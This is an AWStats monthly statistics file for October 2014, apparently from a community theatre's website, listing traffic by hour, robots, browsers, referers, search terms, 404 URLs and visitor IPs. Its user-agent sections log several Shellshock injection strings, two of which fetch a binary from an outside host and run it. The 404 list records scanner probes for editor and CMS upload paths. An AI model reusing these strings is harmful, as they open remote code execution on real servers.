AWSTATS DATA FILE 6.7 (build 1.892)
# If you remove this file, all statistics for date 201410 will be lost/reset.

# Position (offset in bytes) in this file of beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 27
POS_GENERAL 1864                
POS_TIME 2537                
POS_VISITOR 23827               
POS_DAY 70365               
POS_DOMAIN 3514                
POS_LOGIN 3749                
POS_ROBOT 3904                
POS_WORMS 5077                
POS_EMAILSENDER 5208                
POS_EMAILRECEIVER 5351                
POS_SESSION 71189               
POS_SIDER 71400               
POS_FILETYPES 5486                
POS_OS 5704                
POS_BROWSER 5874                
POS_SCREENSIZE 6803                
POS_UNKNOWNREFERER 6877                
POS_UNKNOWNREFERERBROWSER 10084               
POS_ORIGIN 11020               
POS_SEREFERRALS 11171               
POS_PAGEREFS 11403               
POS_SEARCHWORDS 14502               
POS_KEYWORDS 15338               
POS_MISC 2200                
POS_ERRORS 15795               
POS_CLUSTER 3605                
POS_SIDER_404 15932               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20141101001247 1 0 10289185191213
FirstTime 20141001000923
LastTime 20141031233806
LastUpdate 20141102011551 1 0 0 0 0
TotalVisits 1230                
TotalUnique 982                 
MonthHostsKnown 0                   
MonthHostsUnknown 1257                
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 91 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 68 482 12360799 131 185 3585864
1 75 319 8197085 156 195 4021042
2 29 174 4034449 137 164 3671963
3 48 292 6534849 129 160 4169543
4 60 214 5990675 209 269 5093700
5 33 203 4999573 135 166 4246602
6 64 305 7209327 144 216 4483118
7 47 550 12469811 140 171 3642250
8 175 677 19517336 132 179 2976530
9 150 1108 27580006 305 346 3460709
10 146 1209 29943502 162 201 3581805
11 144 1287 31995862 151 198 4346579
12 134 1443 35275267 148 198 4679459
13 100 882 20950657 137 165 3888823
14 80 1130 27742871 143 184 7792816
15 151 1241 30016865 186 228 4270968
16 114 1092 26022135 137 209 4722943
17 99 912 20964849 135 174 2975628
18 101 1142 26047017 160 192 3892182
19 118 1295 30311763 174 205 7495225
20 103 1150 26240010 160 218 4261582
21 123 957 28722326 226 250 4644261
22 112 1084 23733218 209 250 7184469
23 106 817 18919076 159 202 10308702
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 10 first Pages must be first (order not required for others)
BEGIN_DOMAIN 1
ip 2380 19965 485779328
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 10 first Hits must be first (order not required for others)
BEGIN_ROBOT 28
\wbot[\/\-] 1467 42813289 20141031232331 293
googlebot 1082 27739512 20141031232934 82
baiduspider 275 7733154 20141031201225 17
spider 246 4193708 20141031094804 47
robot 214 3582526 20141031180242 46
slurp 185 10825697 20141031210844 44
crawl 158 3609759 20141031133940 26
mj12bot 137 4061365 20141031212042 61
msnbot\-media 119 1261215 20141021211347 40
turnitinbot 95 1163066 20141021234851 2
core 19 474987 20141013013244 2
exabot 40 283007 20141027221547 19
mojeekbot 16 252031 20141002223638 7
xenu\slink\ssleuth 9 134084 20141031185719 0
unknown 68 1700 20141031231257 68
checkbot 7 919736 20141028125806 0
tencenttraveler 1 67042 20141018094740 0
python 33 735790 20141028034306 5
heritrix 1 67042 20141014210758 0
surveybot 8 268268 20141028065319 4
archive\.org_bot 2 50 20141029063034 2
java 4 201151 20141027225929 1
tarantula 2 134084 20141020015057 0
cfnetwork 1 23295 20141029165947 0
yandex 39 596814 20141031133742 22
mnogosearch 1 67042 20141013150036 0
netcraft 1 67042 20141008073653 0
nutch 12 402402 20141031085420 6
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 8
css 4197 14065346 0 0
png 635 15309549 0 0
html 2329 99456793 0 0
pdf 51 13407553 0 0
jpg 9989 269858333 0 0
js 2424 67084549 0 0
jpeg 105 6097875 0 0
gif 235 499330 0 0
END_FILETYPES

# OS ID - Hits
BEGIN_OS 12
winxp 1002
winlong 795
unix 75
winnt 8975
win2000 34
linuxubuntu 27
linux 2740
win16 3
macosx 5822
win95 3
win2003 15
Unknown 474
END_OS

# Browser ID - Hits
BEGIN_BROWSER 64
msie6.0 181
firefox28.0 5
firefox5.0 3
firefox20.0 5
firefox3.0.7 3
firefox3.6 1
firefox4.0.1 3
firefox26.0 9
firefox2.0.0.15 22
firefox4.0 2
msie4.01 3
firefox18.0 4
lynx 5
curl 3
firefox3.5.3 7
firefox24.0 18
firefox3.6.15 123
firefox31.0 66
msie8.0 590
firefox6.0.2 10
firefox13.0.1 1
netscape0.91 6
msie7.0 129
firefox3.5.8 3
firefox16.0 1
wget 6
msie5.0 3
msie9.0 810
Unknown 150
firefox11.0 6
netscape 4
firefox32.0 1387
msie5.01 1
opera 49
firefox21.0 34
samsung 3
firefox3.6.2 1
firefox29.0 16
firefox3.5.2 1
msie5.5 3
firefox30.0 46
firefox12.0 9
firefox1.0.7 1
netscape0.6 3
firefox33.0 149
mozilla 2528
firefox25.0 49
netscape5.0 1
firefox14.0.1 27
firefox22.0 1
msie10.0 434
firefox3.6.64 2
netscape4.0 5
firefox6.0 32
firefox3.6.3 5
firefox3.0.13 25
msie 10
firefox19.0 1
firefox8.0.1 15
safari 12852
firefox3.6.8 12
firefox35.0 20
firefox15.0.1 58
firefox16.0.1 3
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 43
Lynx/2.8.8dev.9_libwww-FM/2.14_SSL-MM/1.4.1_GNUTLS/2.12.14 20141031161916
AppEngine-Google;_(_http://code.google.com/appengine;_appid:_s~getfavicon27) 20141029003436
Curl/PHP_5.4.33_(http://github.com/shuber/curl) 20141005222035
rarely_used 20141009200820
()_{_:;};_/bin/bash_-c_\ 20141020212225
Mozilla/4.0_(compatible;_Synapse) 20141002134357
A6-Indexer/1.0_(http://www.a6corp.com/a6-web-scraping-policy/) 20141031205359
()_{_:;_};_echo_Content-type:text/plain;echo;echo;echo_M`expr_1330___7`H;_wget_-O_/var/tmp/sysinfo_https://fs07n5.sendspace.com/dl/09a5e89fc7fadf22dd0318e37132e993/542eb2041a268d57/0r4nfb/sysinfo;chmod__x_/var/tmp/sysinfo;/var/tmp/sysinfo 20141003165619
Mozilla/4.0_(compatible;_Blog_Search;) 20141022091219
Opera/9.80_(Android;_Opera_Mini/7.6.35766/35.5003;_U;_ru)_Presto/2.8.119_Version/11.10 20141017090445
WFilter_Live_Category 20141028210515
Mozilla 20141011072911
Curl/PHP_5.3.28_(http://github.com/shuber/curl) 20141029180516
Lynx/2.8.5rel.1_libwww-FM/2.15FC_SSL-MM/1.4.1c_OpenSSL/0.9.7e-dev 20141014130046
Mozilla/5.0_(compatible) 20141008083315
Mozilla/4.0 20141019064543
Mozilla/5.0_(compatible;_pmoz.info_ODP_link_checker;__http://pmoz.info/doc/botinfo.htm) 20141031062747
YahooCacheSystem 20141017000939
facebookexternalhit/1.1_(_http://www.facebook.com/externalhit_uatext.php) 20141031235237
Mozilla/5.0_(Android;_Mobile;_rv:32.0)_Gecko/32.0_Firefox/32.0 20141003124420
NerdyBot 20141031111852
Mozilla/5.0_(compatible;_SearchmetricsBot;_http://www.searchmetrics.com/en/searchmetrics-bot/) 20141017045430
Mozilla/5.0_(compatible;_SiteExplorer/1.0b;__http://siteexplorer.info/) 20141031231404
Mozilla/5.0_(compatible;_coccoc/1.0;__http://help.coccoc.com/) 20141030004601
Mozila 20141011072913
Mozilla/5.0_(compatible;_MSIE_or_Firefox_mutant;_not_on_Windows_server;___http://tab.search.daum.net/aboutWebSearch.html)_Daumoa/3.0 20141030181250
SAMSUNG-GT-C3312R/1.0_NetFront/4.2_Profile/MIDP-2.0_Configuration/CLDC-1.1 20141030234445
Mozilla/5.0_(compatible;_Blekkobot;_ScoutJet;__http://blekko.com/about/blekkobot) 20141020075815
Mozilla/0.91_Beta_(Windows) 20141019161243
- 20141031173802
Mozilla/0.6_Beta_(Windows) 20141014045014
Mozilla/5.0_(compatible;_Add_Catalog/2.1;) 20141030031602
()_{_:;_};echo_Content-type:text/plain;echo;echo;echo_M`expr_1330___7`H; 20141002120331
Mozilla/5.0_(BlackBerry;_U;_BlackBerry_9930;_en-US)_AppleWebKit/534.11__(KHTML,_like_Gecko)_Version/7.1.0.1066_Mobile_Safari/534.11_ 20141004210229
Internet_Explorer 20141009165229
Visited_by_http://tools.geek-tools.org 20141020215726
weebly-agent 20141010114025
()_{_:;_};_echo_Content-type:text/plain;echo;echo;echo_M`expr_1330___7`H;_wget_-O_/tmp/404.cgi_http://195.154.184.150/404.cgi;chmod_755_/tmp/404.cgi;/tmp/404.cgi;rm_-rf_/tmp/404.cgi* 20141005060734
()_{_:;_};_echo_Content-type:text/plain;echo;echo;echo_M`expr_1330___7`H; 20141009215828
Mozilla/6.0_(compatible) 20141008083246
Mozilla/5.0_(compatible;_Nett.io_bot/1.0;__http://nett.io/) 20141018114455
Mozilla/4.0_(compatible;) 20141031224324
BlackBerry9000/4.6.0.167_Profile/MIDP-2.0_Configuration/CLDC-1.1_VendorID/102_ips-agent 20141011113130
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 16
()_{_:;_};echo_Content-type:text/plain;echo;echo;echo_M`expr_1330___7`H; 20141002120331
AppEngine-Google;_(_http://code.google.com/appengine;_appid:_s~getfavicon27) 20141029003436
Internet_Explorer 20141009165229
Mozila 20141011072913
Visited_by_http://tools.geek-tools.org 20141020215726
weebly-agent 20141010114025
rarely_used 20141009200820
- 20141031173802
YahooCacheSystem 20141017000939
facebookexternalhit/1.1_(_http://www.facebook.com/externalhit_uatext.php) 20141031235237
()_{_:;};_/bin/bash_-c_\ 20141020212225
()_{_:;_};_echo_Content-type:text/plain;echo;echo;echo_M`expr_1330___7`H; 20141009215828
BlackBerry9000/4.6.0.167_Profile/MIDP-2.0_Configuration/CLDC-1.1_VendorID/102_ips-agent 20141011113130
A6-Indexer/1.0_(http://www.a6corp.com/a6-web-scraping-policy/) 20141031205359
NerdyBot 20141031111852
WFilter_Live_Category 20141028210515
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 959 1368
From1 14 14
From2 395 624
From3 273 318
From4 739 17641
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 8
google 293 521
baidu 34 34
search 20 20
live 2 2
aol 6 6
yandex 4 4
ask 3 3
yahoo 33 34
END_SEREFERRALS

# External page referers - Pages - Hits
# The 10 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 72
http://www.bing.com/search 47 47
http://semalt.semalt.com/crawler.php 35 35
http://www.carnegielibrary.org/research/film/theater/companies.html 8 8
http://pittsburgh.about.com/od/theater/ 8 8
http://pittsburgh.about.com/gi/dynamic/offsite.htm 7 7
http://www.inwestmoreland.com/wclocalinfo/art.aspx 7 7
http://www.swpenna.com/things_to_do_in_pittsburgh.asp 7 7
http://www.artparquet.ru 6 6
http://www.swpenna.com/westmoreland-county-pa.htm 6 6
http://chimiver.info 6 6
http://www.westmorelandheritage.org/cultural-attractions/theatres/ 2 2
http://leadwayau.com 1 1
http://www.post-gazette.com/www.post-gazette.com/ae/theater-dance/2014/09/11/Fall-Arts-Preview-Plays-and-musicals 1 1
http://www.carnegielibrary.org/research/film/theater/childrens.html 5 5
http://psi-lab.ru 3 3
http://www.meetup.com/Food-Fun-n-Friends/events/197732232/ 1 1
http://sanatorrii.ru 3 3
http://m.yp.com/delmont-pa/mip/apple-hill-playhouse-8254576 1 1
http://diplom-nk.com 3 3
http://www.post-gazette.com/ae/theater-dance/2014/09/11/Fall-Arts-Preview-Plays-and-musicals/stories/201409110128 1 1
http://ulibka-baby.com.ua 3 3
http://doubleumarketing.com 1 1
http://privhosting.com 1 1
http://south-america.sos1.tel 2 2
http://doska-vsem.ru 3 3
https://m.facebook.com 1 1
http://www.wqed.org/fm/calendar.php 2 2
http://www.whereandwhen.com/things+to+do/Apple+Hill+Playhouse/ 1 1
http://nett.io 1 25
http://www.texxinternational.com/soft.php 2 2
http://www.co.westmoreland.pa.us/index.aspx 1 1
http://7574717.semalt.com/crawler.php 5 5
http://poisk-zakona.ru 6 6
http://2588209.semalt.com/crawler.php 4 4
http://g-dver.ru 3 3
http://triharder.co.uk 1 1
http://7zap.pro 3 3
http://nonews.co 3 3
http://cherry.tel 1 1
http://www.co.westmoreland.pa.us/Common/Modules/LeavingSite/Dialog.aspx 3 3
http://www.pinterest.com/pin/568157309211470280/ 1 1
http://www.search-error.com/index.php 2 2
http://pogoda.tel 2 2
http://utahbankruptcytoday.com 1 1
http://www.pavisitorsnetwork.com/cgi-bin/page3.cgi 1 1
http://domainsigma.com/whois/applehillplayhouse.net 3 3
http://expertnaya-ocenka.ru 3 3
http://teeho.ru 3 3
https://www.facebook.com 1 1
http://ehose-store.com 6 6
http://www.funpennsylvania.com/category/childrens-theater-in-pa/ 5 5
http://buttons-for-website.com 1 1
http://greenvalleyspices.com 1 1
http://modabutik.ru 3 3
http://turtleluck.com 1 1
http://5elementov.ru 3 3
http://impari-scuola.it 1 1
http://eastbourneholidaycottages.co.uk 1 1
http://musicaltheatreresource.blogspot.co.uk/search 0 1
http://vita-power.ru 3 3
http://www.tecspb.ru/rasprostranenie-listovok.html 3 3
http://www.webwiki.com/www.applehillplayhouse.org 2 2
http://nsk-diplom.com 3 3
http://magic-foil.com 1 1
http://galopom-po.ru 3 3
http://torrnada.ru 3 3
http://aosheng-tech.com 1 1
http://www.bing.com/images/search 0 20
http://www.canon50.org/sitemap-daffy-duck-clipart-8ad2z 2 2
http://alarmobninsk.ru 3 3
http://domainsigma.com/whois/applehillplayhouse.org 3 3
http://ford8n.com/soft.php 2 2
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 25
apple+hill+playhouse 10
betac 7
applehillplayhouse.net 4
apple+hill+playhouse+delmont 3
applehill+playhouse+delmont 2
apple+hill+playhouse+murrysville 2
http+//www.applehillplayhouse.org/ 1
applewood+playhouse 1
playhouse+pittsburgh 1
musicals+in+delmont+pa 1
apple+hill+playhouae 1
www.applehillplayhouse.org 1
apple+tree+playhouse+delmont 1
october+2014+apple+hill+playhouse 1
kate+o+halloran+irwin 1
%d0%bf%d0%bb%d0%b5%d0%b5%d1%80+apple+her 1
apple+hill+playhouse+schedule 1
dinner+theater+in+greensburg+pa 1
apple+playhouse 1
apple+hill+playhouse+15626.com 1
murrysville+pa+theatre 1
apple+hill+dinner+theater 1
mob_sug.idx 1
apple+hill+theater 1
apple+playhouse+greensburg+pa 1
END_SEARCHWORDS

# Search keywords - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 33
apple 25
playhouse 25
hill 21
delmont 7
betac 7
pa 4
applehillplayhouse.net 4
theater 3
murrysville 3
in 2
tree 1
http 1
musicals 1
irwin 1
schedule 1
theatre 1
applewood 1
kate 1
%d0%bf%d0%bb%d0%b5%d0%b5%d1%80 1
dinner 2
october 1
applehill 2
2014 1
//www.applehillplayhouse.org/ 1
playhouae 1
www.applehillplayhouse.org 1
her 1
halloran 1
mob_sug.idx 1
pittsburgh 1
15626.com 1
o 1
greensburg 2
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 5
403 12 4377
206 79 1459538
400 2 532
405 2 458
404 588 253000
END_ERRORS

# URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 190
/.replace(/.*( 1 -
/admin/fckeditor/editor/filemanager/connectors/php/connector.php 1 -
/_fck/fckeditor/editor/ 2 -
/admin.php 13 -
/_install/fckeditor/editor/ 2 -
/data/fckeditor/editor/ 2 -
/index.rdf 1 -
/lib/uploadify/uploadify.swf 1 http://www.applehillplayhouse.org/lib/uploadify/uploadify.swf
/dodo/fckeditor/editor/ 2 -
/fck/fckeditor/editor/ 2 -
/_db/fckeditor/editor/ 2 -
/_editor/fckeditor/editor/ 2 -
/rss.xml 1 -
/index.xml 1 -
/messageboard/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php 1 -
/editor/editor/ 2 -
/asp/fckeditor/editor/ 2 -
/system/fckeditor/editor/ 3 -
/fckeditor/editor/filemanager/connectors/php/connector.php 1 -
/xmlrpc.php 2 -
/scripts/'+url+' 1 -
/editor/editor/filemanager/connectors/test.html 1 -
/config/fckeditor/editor/ 2 -
/data/atom 1 -
/adm/fckeditor/editor/ 2 -
/nyet.gif 2 -
/wp-content 2 -
/includes/uploadify/uploadify.swf 1 http://www.applehillplayhouse.org/includes/uploadify/uploadify.swf
/FCKeditor/editor/filemanager/connectors/test.html 1 -
/eweb/fckeditor/editor/ 2 -
/js/fckeditor/editor/ 3 -
/_mailto=check 2 -
/apple-touch-icon-76x76-precomposed.png 1 -
/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php 1 -
/_demand_add/fckeditor/editor/ 2 -
/_config/fckeditor/editor/ 2 -
/login/fckeditor/editor/ 2 -
/rainbow/ 18 http://www.inwestmoreland.com/greatplaces/03-09/applehill.aspx
/cgi-sys/entropysearch.cgi 4 -
/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php 1 -
/FCKeditor/editor/filemanager/connectors/php/connector.php 1 -
/images/jdownloads/screenshots/nyet.gif 1 -
/page28.html 4 -
/link/fckeditor/editor/ 2 -
/js/uploadify/uploadify.swf 1 http://www.applehillplayhouse.org/js/uploadify/uploadify.swf
/dinnertheater/dinnermenu.htmlCachedSimilar 10 -
/administrator/ 8 -
/_login/fckeditor/editor/ 2 -
/board/fckeditor/editor/ 2 -
/db/fckeditor/editor/ 2 -
/data/rss 1 -
/messageboard/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php 1 -
/admin/uploadify/uploadify.swf 1 http://www.applehillplayhouse.org/admin/uploadify/uploadify.swf
/wp-login.php 27 -
/RK=0/RS=LDQntz.nY4FpAKIlevfCCyogvfU- 1 http://www.applehillplayhouse.org/
/scripts/'%20+http+%20action%20+' 154 http://www.applehillplayhouse.org/scripts/user.js
/wp/wp-admin/ 1 -
/cgi-bin/hi 1 -
/page23.html 4 -
/admin_/fckeditor/editor/ 2 -
/install/fckeditor/editor/ 2 -
/components/com_community/index.html 1 -
/plugins/uploadify/uploadify.swf 1 http://www.applehillplayhouse.org/plugins/uploadify/uploadify.swf
/_dodo_/fckeditor/editor/ 2 -
/membin/fckeditor/editor/ 2 -
/wp-login/ 1 -
/_authchangeurl/fckeditor/editor/ 2 -
/engine/engine.php 1 -
/bbs/fckeditor/editor/ 2 -
/men/fckeditor/editor/ 2 -
/fckeditor/fckeditor/editor/ 2 -
/images/scholarship_application_2011.pdf 2 -
/ewebeditor/fckeditor/editor/ 2 -
/scripts/'+src+' 5 -
/license.txt 2 -
/Fckeditor/editor/filemanager/browser/default/connectors/test.html 1 -
/demand/fckeditor/editor/ 2 -
/demandadd/fckeditor/editor/ 2 -
/_manage/fckeditor/editor/ 2 -
/P%C3%88%C2%A3%02 1 http://applehillplayhouse.org/
/includes/fckeditor/editor/ 2 -
/FCK/editor/filemanager/browser/default/connectors/php/connector.php 1 -
/rss 2 -
/section/wp-login.php 1 -
/favicon.gif 3 -
/fck/editor/filemanager/browser/default/connectors/php/connector.php 1 -
/mailto=check 2 -
/scripts/multichat.jar 1 -
/administrator/index.php 6 -
/cgi-bin/wspd_cgi.sh 1 -
/readme.html 2 -
/images/adulttheatreticketorderform.pdf 1 -
/Home/index.php 1 -
/wordpress/wp-admin/ 1 -
/wp-cron.php 2 -
/index.php/feed/ 1 -
/ticketinformation/mainstagetickets.html/../contactus.html 1 http://www.applehillplayhouse.org/ticketinformation/mainstagetickets.html
/admin/fckeditor/editor/ 3 -
/cms/uploadify/uploadify.swf 1 http://www.applehillplayhouse.org/cms/uploadify/uploadify.swf
/scripts/GUIClient.class 1 -
/editor/FCKeditor/editor/dialog/fck_about.html 3 http://applehillplayhouse.org/editor/FCKeditor/editor/dialog/fck_about.html
/sitemap.xml 3 -
/%20 7 -
/admin/FCKeditor/editor/filemanager/connectors/test.html 1 -
/_database/fckeditor/editor/ 2 -
/user 4 -
/images/camps_flyer_2013.pdf 1 -
/cgi-sys/FormMail-clone.cgi 2 -
/feed/ 1 -
/edit/fckeditor/editor/ 2 -
/bin/fckeditor/editor/ 2 -
/wordpress/wp-login.php 1 -
/wp-admin/ 1 -
/blog/feed 1 -
/_edit/fckeditor/editor/ 2 -
/editor/dialog/fck_about.html 2 http://applehillplayhouse.org/editor/dialog/fck_about.html
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php 1 -
/authchangeurl/fckeditor/editor/ 2 -
/browserconfig.xml 9 -
/scripts/fckeditor/editor/ 2 -
/jactshowdescriptions.html/trackback/ 1 http://www.applehillplayhouse.org/jactshowdescriptions.html
/fck/editor/filemanager/connectors/php/connector.php 1 -
/images/2013_ 2 -
/_fckeditor/fckeditor/editor/ 2 -
/FCK/editor/filemanager/connectors/php/connector.php 1 -
/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php 1 -
/_mem_bin/fckeditor/editor/ 2 -
/feed 1 -
/images/adult_order_form_2014.pdf 2 -
/admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php 1 -
/templets/default/style/dedecms.css 1 -
/apple-touch-icon-76x76.png 1 -
/_adm/fckeditor/editor/ 2 -
/apple-touch-icon-120x120.png 1 -
/include/fckeditor/editor/ 3 -
/editor/editor/filemanager/browser/default/connectors/test.html 1 -
/blog/wp-admin/ 1 -
/blog/wp-login.php 1 -
/apple-touch-icon-120x120-precomposed.png 1 -
/baks/fckeditor/editor/ 2 -
/uploadify/uploadify.swf 2 http://www.applehillplayhouse.org/uploadify/uploadify.swf
/images/2011_ 1 -
/site/wp-login.php 1 -
/test/wp-admin/ 1 -
/misc/drupal.js 2 -
/code.jquery.com/jquery-1.11.1.min.js 1 -
/admin/Fckeditor/editor/filemanager/browser/default/connectors/test.html 1 -
/FCKeditor/editor/dialog/fck_about.html 3 http://applehillplayhouse.org/FCKeditor/editor/dialog/fck_about.html
/admin123/fckeditor/editor/ 2 -
/editor/fckeditor/editor/ 2 -
/apple-touch-icon.png 6 -
/common/fckeditor/editor/ 2 -
/admin/FCKeditor/editor/filemanager/connectors/php/connector.php 1 -
/old/wp-admin/ 1 -
/inc/fckeditor/editor/ 2 -
/messageboard/components/com_community/index.html 1 -
/_eweb/fckeditor/editor/ 2 -
/messageboard/index.php 3 -
/admin/FCKeditor/editor/dialog/fck_about.html 3 http://applehillplayhouse.org/admin/FCKeditor/editor/dialog/fck_about.html
/app/fckeditor/editor/ 2 -
/editor/editor/dialog/fck_about.html 3 http://applehillplayhouse.org/editor/editor/dialog/fck_about.html
/manage/FCKeditor/editor/dialog/fck_about.html 3 http://applehillplayhouse.org/manage/FCKeditor/editor/dialog/fck_about.html
/wp/wp-login.php 1 -
/example/fckeditor/editor/ 2 -
/CHANGELOG.txt 2 -
/apple-touch-icon-precomposed.png 6 -
/_ewebeditor/fckeditor/editor/ 2 -
/page27.html 4 -
/page29.html 3 -
/fckeditor/editor/ 2 -
/images/Theatre_ 2 -
/manage/fckeditor/editor/ 3 -
/cgi-sys/realsignup.cgi 2 -
/image/fckeditor/editor/ 2 -
/inc/uploadify/uploadify.swf 1 http://www.applehillplayhouse.org/inc/uploadify/uploadify.swf
/_admin/fckeditor/editor/ 2 -
/rainbow 13 -
/_baks/fckeditor/editor/ 2 -
/ad/fckeditor/editor/ 2 -
/FCK/editor/dialog/fck_about.html 3 http://applehillplayhouse.org/FCK/editor/dialog/fck_about.html
/atom.xml 1 -
/_demand/fckeditor/editor/ 2 -
/index.php 5 -
/database/fckeditor/editor/ 2 -
/_inc/fckeditor/editor/ 2 -
/images/SCHOLARSHIP_APPLICATION_2011.pdf&sa=U&ei=oPRQU4KuCcuQyASho4DwAw&ved=0CBsQFjAA&usg=AFQjCNEGgdxp3xDZ7p69-fzh1AHhroJsgw 2 -
/feeds/posts/default 1 -
/2011adultseason/nuts.html%20ForceRecrawl:%200 2 -
/_example/fckeditor/editor/ 2 -
/messageboard/images/jdownloads/screenshots/nyet.gif 1 -
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 10 first Hits must be first (order not required for others)
BEGIN_VISITOR 1257
37.187.144.114 81 81 2035091 20141011093036
50.252.212.14 46 46 1297380 20141030081859
62.219.8.235 26 42 4091238 20141008083315
146.0.74.205 25 38 879725 20141013091929
195.242.218.133 24 24 734028 20141031061609
5.9.73.48 22 22 581648 20141017045430
37.187.89.77 21 21 514606 20141010014015
146.48.126.212 18 18 541979 20141020224852
88.198.56.239 17 17 547244 20141027231746
144.76.185.173 15 16 556413 20141022105507
82.193.99.33 9 9 311718 20141019161243
69.58.178.56 10 10 348404 20141001210207
54.88.139.24 2 2 41345 20141004220023
82.23.69.115 1 11 167688 20141005162151
173.252.100.117 0 1 41204 
70.199.2.69 2 40 998803 20141002174059
65.55.212.65 0 1 566 
166.137.252.80 1 26 683567 20141029062047
217.69.133.169 2 2 134084 20141020015029
54.89.0.120 4 4 183462 20141001052039
200.140.80.122 1 25 641262 20141006201650
12.182.112.126 2 14 196702 20141013133223
67.238.34.126 1 12 177129 20141004201027
187.75.198.164 1 25 641262 20141020053533
74.98.35.85 1 25 0 20141014215713
74.232.96.234 0 1 12238 
70.197.181.210 1 1 67042 20141001114949
70.209.131.69 1 25 641262 20141003133529
67.186.60.89 5 46 1134267 20141010094951
104.154.17.131 1 25 641262 20141009104337
67.165.72.230 3 43 1045104 20141028210342
130.211.121.226 1 1 67042 20141020111820
72.23.63.166 1 25 641262 20141029213535
81.224.44.99 1 12 157569 20141022121926
176.125.70.208 1 1 67042 20141001055424
70.198.205.85 1 6 161227 20141009105657
174.250.97.23 1 12 163935 20141005142342
119.245.205.2 1 1 67042 20141009215828
67.231.38.154 0 1 12238 
54.203.170.44 2 2 134084 20141010013816
71.10.220.191 1 25 641262 20141018182317
123.125.68.60 1 1 21334 20141031000229
72.37.244.212 3 53 1305932 20141021171504
95.25.104.183 1 11 147114 20141013223114
54.198.215.208 4 4 183462 20141020033912
166.137.242.28 1 31 870873 20141008133405
63.156.223.30 2 28 687563 20141003121143
71.253.69.78 1 12 177129 20141019111728
107.42.97.121 0 1 12238 
71.236.101.40 2 28 687563 20141009201442
123.125.71.107 1 1 19629 20141031152721
61.135.165.54 0 1 25506 
50.243.168.9 3 30 199250 20141029115339
123.125.71.82 0 4 21125 
162.51.225.167 1 25 641262 20141015204125
61.135.165.23 0 1 32785 
104.154.19.80 1 25 641262 20141003165610
70.199.1.99 1 12 159175 20141020062811
107.77.76.29 1 18 214129 20141031152635
73.188.160.144 1 25 641262 20141028195456
130.211.117.39 1 1 67042 20141017103029
71.60.137.137 1 25 641262 20141013145345
190.63.168.98 1 25 641262 20141018134340
123.125.71.109 0 1 0 
67.180.181.217 6 6 268168 20141029113123
134.249.76.28 3 3 55296 20141031065706
173.75.129.143 5 46 1134267 20141005154851
70.198.195.39 0 1 0 
54.85.31.22 0 2 26736 
174.236.194.110 0 1 12238 
62.38.251.59 1 26 671139 20141008042914
73.183.109.191 4 46 1073451 20141018222227
24.131.115.170 8 59 1310927 20141009190937
66.249.83.224 3 3 201126 20141030154357
24.3.119.75 8 62 1448039 20141030220009
157.55.39.84 0 1 566 
24.239.223.5 2 14 199250 20141030145232
24.131.248.156 3 30 709684 20141005191756
88.198.227.103 1 1 67042 20141030090023
73.40.144.27 4 34 743926 20141006212448
180.149.143.139 0 1 29208 
24.255.190.52 0 1 12238 
54.172.178.180 1 1 67042 20141014200908
166.137.242.118 1 25 641262 20141030095751
108.12.90.202 3 29 674642 20141006165411
187.58.80.73 1 34 880607 20141001100958
50.197.55.230 12 95 2242570 20141028160052
70.193.73.226 0 1 12238 
199.30.24.56 0 1 23762 
74.82.64.161 1 5 112331 20141004210022
178.83.93.208 1 25 641262 20141002172257
50.197.49.246 2 40 998803 20141009145900
